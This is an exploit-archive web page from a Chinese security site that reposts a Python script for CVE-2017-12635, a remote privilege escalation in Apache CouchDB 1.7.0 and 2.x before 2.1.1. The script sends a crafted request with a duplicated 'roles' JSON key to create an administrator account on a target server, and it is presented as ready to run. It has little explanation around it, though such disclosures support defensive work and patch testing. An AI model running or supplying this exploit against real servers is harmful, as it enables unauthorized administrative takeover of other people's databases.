首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
来源:@r4wd3r 作者:r4wd3r 发布时间:2018-04-24  
# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
# Date: 2017-08-07
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
# Software Link: http://couchdb.apache.org/
# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
# CVE : CVE-2017-12635
 
#!/usr/bin/env python
 
import argparse
import re
import sys
import requests
 
parser = argparse.ArgumentParser(
    description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
    ' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
                    type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
                    type=str, default='couchapass')
args = parser.parse_args()
 
host = args.host
port = args.port
user = args.user
password = args.password
 
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
    print "[x] Wrong host. Must be a valid IP address."
    sys.exit(1)
 
print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port
 
url = 'http://' + host + ':' + port
 
try:
    rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
    print "[x] Server is taking too long to answer. Exiting."
    sys.exit(1)
except requests.ConnectionError:
    print "[x] Unable to connect to the remote host."
    sys.exit(1)
 
# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
 
try:
    rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
    print "[x] ERROR: Unable to create the user on remote host."
    sys.exit(1)
 
if rcu.status_code == 201:
    print "[+] User " + user + " with password " + password + "successfully created."
    sys.exit(0)
else:
    print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kaspersky KSN Remote Code Exec
·PRTG Network Monitor < 18.1.39
·lastore-daemon D-Bus Privilege
·Interspire Email Marketer < 6.
·ASUS infosvr Authentication By
·VLC Media Player/Kodi/PopcornT
·Chrome V8 JIT NodeProperties::
·Ericsson-LG iPECS NMS A.1Ac -
·Microsoft Internet Explorer 11
·R 3.4.4 - Local Buffer Overflo
·VX Search 10.6.18 - 'directory
·Allok Video to DVD Burner 2.6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved